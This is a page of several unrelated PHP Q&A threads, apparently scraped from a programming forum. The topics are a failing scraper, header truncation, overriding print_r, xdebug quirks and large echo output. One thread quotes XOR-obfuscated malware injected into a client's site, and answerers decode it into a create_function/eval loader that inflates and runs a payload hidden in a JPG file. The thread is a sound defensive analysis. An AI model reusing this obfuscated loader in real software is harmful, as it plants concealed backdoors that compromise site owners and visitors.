PHP code scraping a URL suddenly stopped working - php

$url = 'the web address I want to get the first and second numbers close to $' ;
$str = file_get_contents($url);
preg_match_all('/ ([$]) *(\d+(:?.\d+)?)/', $str, $matches, PREG_SET_ORDER);
$i=0;
foreach ($matches as $val) {
if($i==0) $first=$val[2] ;
if($i==3) $second=$val[2] ;
$i++;
}
$bad_symbols = array(",", "."); $first = str_replace($bad_symbols, "", $first);
$bad_symbols = array(",", "."); $second = str_replace($bad_symbols, "", $second);
echo $first . "</br>";
echo $second;
it worked fine till yesterday
what could be the problem?

I see at least two possible explanations :
The HTML of the site has changed ; maybe only a little bit -- but enough to get you in trouble.
You could test for the return value of preg_match_all
if it's false, it means your regex didn't match -- which may indicate the content of the HTML pageis not the same...
Then, you might have to modify your regex
The admin of the server (or it can be done in the code generating the page) has banned you
Maybe the website has detected it was scraped by you (either because you were going too hard on their server, or they saw their content on your site)
And they banned your IP (for instance)
To detect that, try to get the return value of file_get_contents ; if it's false, it might be the cause of the problem
Can you try getting that HTML page from your server, using wget in command-line ?
A third one, as suggestd by others : maybe the configuration of your server has changed, and you can't use file_get_content over HTTP anymore...
A solution would be to use curl, for instance
Check in your configuration the allow_url_fopen directive
If you activate error_reporting (see also), you might also get some informations that could prove usefull...

Maybe system administrator has changed allow_url_fopen directive, that means you can't access files that are not on your server. Check what file_get_contents() returns, because you gave us very little information about error.
Another problem, as mentioned above, could be that remote site has been changed :)

Related

PHP / Apache Headers issue where apache_response_headers functions returns truncated headers keys with php-7 and above

I'm facing a quite weird issue where using php apache_response_headers function returns an array of headers where the keys are truncated by one character
Notes:
I have tested with a bare test.php file with print_r(apache_response_headers()) and got the same results
the issue does not appear as soon as I switch to php <= 5.6
I have tested on a few servers with the same results
I have searched all over but no one seem to have the same issue
Is it something that someone has encountered in the past
Would there be a way to debug this?
thanks in advance
I can confirm that I'm seeing the same issue on Windows, IIS 7.5, PHP 7.0.27. I do not have this issue on Linux, Apache 2.4, 7.0.30.
A pseudo workaround is:
$headers = array() ;
foreach(headers_list() as $header) {
$temp = explode(':',$header,2) ;
$headers[$temp[0]] = trim($temp[1]) ;
}
echo '<pre>' ; var_dump($headers) ;
I'm sure there may be situations that the above hack won't give you what you want, but I am not familiar enough with Apache's headers to know.

Is it possible to change the behavior of PHP's print_r function [duplicate]

This question already has answers here:
making print_r use PHP_EOL
(5 answers)
Closed 6 years ago.
I've been coding in PHP for a long time (15+ years now), and I usually do so on a Windows OS, though most of the time it's for execution on Linux servers. Over the years I've run up against an annoyance that, while not important, has proved to be a bit irritating, and I've gotten to the point where I want to see if I can address it somehow. Here's the problem:
When coding, I often find it useful to output the contents of an array to a text file so that I can view it's contents. For example:
$fileArray = file('path/to/file');
$faString = print_r($fileArray, true);
$save = file_put_contents('fileArray.txt', $faString);
Now when I open the file fileArray.txt in Notepad, the contents of the file are all displayed on a single line, rather than the nice, pretty structure seen if the file were opened in Wordpad. This is because, regardless of OS, PHP's print_r function uses \n for newlines, rather than \r\n. I can certainly perform such replacement myself by simply adding just one line of code to make the necessary replacements, ans therein lies the problem. That one, single line of extra code translates back through my years into literally hundreds of extra steps that should not be necessary. I'm a lazy coder, and this has become unacceptable.
Currently, on my dev machine, I've got a different sort of work-around in place (shown below), but this has it's own set of problems, so I'd like to find a way to "coerce" PHP into putting in the "proper" newline characters without all that extra code. I doubt that this is likely to be possible, but I'll never find out if I never ask, so...
Anyway, my current work-around goes like this. I have, in my PHP include path, a file (print_w.php) which includes the following code:
<?php
function print_w($in, $saveToString = false) {
$out = print_r($in, true);
$out = str_replace("\n", "\r\n", $out);
switch ($saveToString) {
case true: return $out;
default: echo $out;
}
}
?>
I also have auto_prepend_file set to this same file in php.ini, so that it automatically includes it every time PHP executes a script on my dev machine. I then use the function print_w instead of print_r while testing my scripts. This works well, so long as when I upload a script to a remote server I make sure that all references to the function print_w are removed or commented out. If I miss one, I (of course) get a fatal error, which can prove more frustrating than the original problem, but I make it a point to carefully proofread my code prior to uploading, so it's not often an issue.
So after all that rambling, my question is, Is there a way to change the behavior of print_r (or similar PHP functions) to use Windows newlines, rather than Linux newlines on a Windows machine?
Thanks for your time.
Ok, after further research, I've found a better work-around that suite my needs, and eliminates the need to call a custom function instead of print_r. This new work-around goes like this:
I still have to have an included file (I've kept the same name so as not to have to mess with php.ini), and php.ini still has the auto_prepend_file setting in place, but the code in print_w.php is changes a bit:
<?php
rename_function('print_r', 'print_rw');
function print_r($in, $saveToString = false) {
$out = print_rw($in, true);
$out = str_replace("\n", "\r\n", $out);
switch ($saveToString) {
case true: return $out;
default: echo $out;
}
}
?>
This effectively alters the behavior of the print_r function on my local machine, without my having to call custom functions, and having to make sure that all references to that custom function are neutralized. By using PHP's rename_function I was able to effectively rewrite how print_r behaves, making it possible to address my problem.

PHP 302 Redirect virus/hack found, need help to decipher

A client recently came to me with an issue where their website would redirect to different websites against their wishes. The culprit turned out to be the following snippet:
// $wp_ac_remote_retrieve_header = ',S7<f-NH9;%.KM7kF0^L2&1YzYJM.>RB,|Mu"C_#}H2#HEFGKSI 5<K8]M"97Z)GM&FbN%CAKL1/Z:JUOD3!9-!.<B0?9kCNWBQ~~k1U7,7i~&>8<(R<NE<^Zb0>2,EQ]R/SS%wSSD!yN,;"#/T$d/>&b|a^v' ^ "I%VPNm)2PUCB*9RC Y2)mAT-%:%#Z[<6_ToZJ,2%R*^B<1i!*> LL^>K4#GJD9L)9C4L-J.n&5PK7S\$z#-QSX_HKOm`wi.;-2.~.6;t-TI[F-N_JYL}y=&T;(MtYUo*?)3F=6WX;6(Q&<IWCWF;JJ_PA#UHwM";
// $get_ho_tag_template = 'cr atDW"ufb4)j.'|'!"E!`%HDTl#pHoJ';
// $start_hg_wp = $get_ho_tag_template(null,$wp_ac_remote_retrieve_header);
// $start_hg_wp();
And apparently this is not the first time they have been hacked, as I also found the following snippet commented out:
// $comment_zr_date = 'J4UCmj82"&6D?XQz/_F;kB<:#L,FYR<*+vMYS"87tW8OE# B8>LDS=R+ HI<=8S#G5VG#Q;jM^]#5F<(B+5n_DW6L,CX#Nr=h2X:_MKaq-*FOOXH;>^)+FV90%a7qyg^N3*DVQCT7:MvJkKU' ^ '/B4/E*_HKHP(^,4RI6*^4%YN|/C(-7R^X^ov;MUR[0W=!LN$LNc"2P;GY*<OTV6P4V3)44ID.10oX?]L/B[A3-5D-^*=3a"u8w Y:!d19}o>,*4ghV?[N"yv|`Ng!*H7#RM!farz]J*TcBbn';
// $get_spe_footer = "<=:Q.0(CEVO!8=J" ^ "_O_0ZUw%08,UQR\$";
// $wp_olw_rss = $get_spe_footer(null,$comment_zr_date);
// $wp_olw_rss();
There are no other references to any of these functions/variables. Or at least none that turn up when I do a sitewide search. Also, the file's permissions had been changed to read only.
Any idea as to how they are accomplishing this? Or how the above code functions/works? When removed, the issue/hack disappears completely. However, as this is their 3rd time encountering this issue, I believe that they have left themselves open somewhere. As a note, this is not a WP site.
** EDIT
File was to large to include, here is a link:
http://pastebin.com/1XyJg4S3
If you run this through a base64 decoder, you get:
http://pastebin.com/JMHtqskM
However, I am unable to decipher it any further. There appears to be either more encoding or...?
It's some kind of interesting obfuscation.
echo $comment_zr_date;
gives:
eval(#gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg")));
And
echo $get_spe_footer;
Gives:
create_function
The obfuscation works by using bitwise operators on two string (thanks tot Populus for the hint). See also PHP strange bitwise operator impact on strings
In cleartext php it says:
$comment_zr_date = 'eval(#gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg")))';
$get_spe_footer = 'create_function';
// execute the function
$wp_olw_rss = $get_spe_footer(null,$comment_zr_date);
$wp_olw_rss();
Further evaluation is possible after you post the contents of
#gzinflate(file_get_contents("/home/gordonftp/familybusinesscenter.com/myadmin/libraries/PHPExcel/PHPExcel/Shared/OLE/PPS/image001.jpg"))

xdebug is skipping lines while debugging

Using Eclipse/xdebug n Windows 2008 server. Yesterday I was able to successfully debug one php file. Today, with a very similar php file, it is skipping lines and then going off into oblivion.
Code snippet:
//$data = file_get_contents('php://input');
$data = '[{"ARDivisionNo":"01","CustomerNo":"ABF","ContactCode":"ARTIE JOHN","CustomerName":"American Business Futures","fname":"Artie ","lname":"Johnson","EmailAddress":"philmcintosh#comcast.net","Billing_Address1":"2131 N. 14th Street","Billing_Address2":"Suite 105","Billing_Address3":"Accounting Department","Billing_City":"Irvine","Billing_State":"CA","Billing_Zip":"92618","UDF_FC_ENABLED":"Y","UDF_FC_CUSTOMERID":2.0,"UDF_FC_ADDRESS_BOOK_ID":3.0,"TelephoneNo1":"","FaxNo":""}]';
$json = json_decode($data, true);
Foreach ($json as $i => $row) {
$customers_id = tep_db_prepare_input($row['UDF_FC_CUSTOMERID']);
$customers_firstname = tep_db_prepare_input($row['fname']);
(I pasted in the json for debugging purposes - this worked yesterday in the other file.)
In this file, the first strange thing is the debugger actually stops on the commented out "$data = file_get_contents('php://input');" line.
The after the next "$data =" line, it skips to "$customers_id =" line. At this point $data shows as empty in the variables window.
Any ideas on what is wrong/how to fix?
It is likely that Xdebug seems a different file of source code than that you think you see. Are you sure you have saved the file first before starting to debug?
There are a few cases where Xdebug does skip lines as it doesn't see any breakpoints. This is because PHP itself doesn't always give this possibility. It is often on if/else statements without { and } only though. In order to find out what is going on, you can make a remote debugging log by adding to php.ini:
xdebug.remote_log=/tmp/xdebug.log
Xdebug will write all communication packets into this log for you to look at. Perhaps that gives a clue.

Echoing large string in PHP results in no output at all

I am helping to build a Joomla site (using Joomla 1.5.26). One of the pages are really really big. As a result, PHP just stops working without any error and all previously printed strings are ignored. There is no output at all. We have display_errors set to TRUE and error_reporting set to E_ALL.
I found the exact line where PHP breaks. It's in libraries/joomla/application/component/view.php:196
function display($tpl = null)
{
$result = $this->loadTemplate($tpl);
if (JError::isError($result)) {
return $result;
}
echo $result;
}
Some information:
Replacing echo $result; with echo strlen($result); works. The length of the string is 257759.
echo substr($result, 0, 103396); is printing partial content.
echo substr($result, 0, 103397); results in no output at all.
echo substr($result, 0, 103396) . "A"; results in no output at all. So splitting string into chunks is not a solution.
I have checked server performance during the execution of the script. CPU usage is 100% but there's plenty of memory left. PHP memory limit is 1024M. output_buffering is 4096 but I tried setting it to unreasonably high number - dies at exact same position. Server runs Apache 2.2.14-5ubuntu8.10 and PHP 5.3.2-1ubuntu4.18. PHP runs as fast_cgi module.
I have never experienced something like that and Google search results in nothing also. Have any of you experienced something like that and know the solution?
Thanks for reading!
Maybe try exploding the string and looping through each line.
You could also try this, found on php.net - echo:
<?php
function echobig($string, $bufferSize = 8192)
{
// suggest doing a test for Integer & positive bufferSize
for ($chars = strlen($string)-1, $start = 0;$start <= $chars; $start += $bufferSize) {
echo substr($string, $start, $bufferSize);
}
}
?>
Basically, it seems echo can't handle such large data in one call. Breaking it up somehow should get you where you need to go.
what about try using print_r rather than echo
function display($tpl = null)
{
$result = $this->loadTemplate($tpl);
if (JError::isError($result)) {
return $result;
}
print_r($result);
}
I have tested this on the CLI and it works fine with PHP 5.4.11 and 5.3.15:
$str = '';
for ($i=0;$i<257759;$i++) {
$str .= 'a';
}
echo $str;
It seems a reasonable assumption that PHP itself works fine, but that the output buffer is too large for Apache/fast_cgi. I would investigate the Apache config further. Do you have any special Apache settings?
May be that?
Try something like this
php_flag output_buffering On
Or try to turn on gzip in Joomla!
Or use nginx as reverse proxy or standalone server :^ )
It seems I solved the problem by myself. It was somewhat unexpected thing - faulty HTML formatting. We use a template for order page and inside there is a loop which shows all ordered products. When there were a few products, everything worked great but when I tried to do the same with 40 products, the page did break.
However I still don't understand why the server response would be empty with status code 200.
Thanks for answers, everybody!

Categories